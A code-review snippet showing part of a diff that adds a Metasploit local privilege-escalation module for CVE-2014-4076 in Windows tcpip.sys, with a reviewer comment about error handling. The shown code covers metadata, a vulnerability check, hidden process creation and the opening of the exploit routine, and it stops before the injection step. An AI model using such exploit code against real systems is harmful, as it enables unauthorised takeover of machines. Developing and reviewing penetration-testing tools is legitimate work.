modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb

```diff
@@ -0,0 +1,177 @@
+      'Description'    => %q{
+        A vulnerability within Microsoft TCP/IP protocol driver, tcpip.sys, can allow an attacker
+        to inject memory controlled by the attacker into an arbitrary location.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
+          'Jay Smith <jsmith[at]korelogic.com>' # MSF module
+        ],
+      'Arch'          => ARCH_X86,
+      'Platform'      => 'win',
+      'SessionTypes'  => [ 'meterpreter' ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Targets'       =>
+        [
+          ['Windows Server 2003 SP2', {} ]
+        ],
+      'References'    =>
+        [
+          ['CVE', '2014-4076'],
+          ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt']
+        ],
+      'DisclosureDate'=> 'Nov 11 2014',
+      'DefaultTarget' => 0
+    }))
+
+    register_options(
+      [
+        OptString.new('PID', [true, 'The target PID to elevate into', nil]),
+      ])
+
+  end
+
+  def check
+    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
+      return Exploit::CheckCode::Safe
+    end
+
+    handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    if handle.nil?
+      return Exploit::CheckCode::Safe
+    end
+    session.railgun.kernel32.CloseHandle(handle)
+
+    file_path = get_env('WINDIR') << "\\system32\\drivers\\tcpip.sys"
+    unless file?(file_path)
+      return Exploit::CheckCode::Unknown
+    end
+
+    major, minor, build, revision, branch = file_version(file_path)
+    vprint_status("tcpip.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
+
+    if ("#{major}.#{minor}.#{build}" == "5.2.3790" && "#{revision}" < 5440)
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def create_proc
+    windir = session.sys.config.getenv('windir')
+    cmd = "#{windir}\\System32\\notepad.exe"
+    # run hidden
+    begin
+      proc = session.sys.process.execute(cmd, nil, 'Hidden' => true)
+    rescue Rex::Post::Meterpreter::RequestError
+      return nil
+    end
+
+    proc.pid
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Exploit::Failure::None, 'Session is already elevated')
+    end
+
+    if sysinfo["Architecture"] =~ /wow64/i
+      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
+    elsif sysinfo["Architecture"] =~ /x64/
+      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
+    end
+
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
+    end
+
+    p = payload.encoded
+    new_pid = create_proc
+
+    if new_pid.nil?
+      print_warning('Unable to create a new process.')
+      return
```

Comment:
This looks like another case for `fail_with` instead of `print_warning` followed by `return`.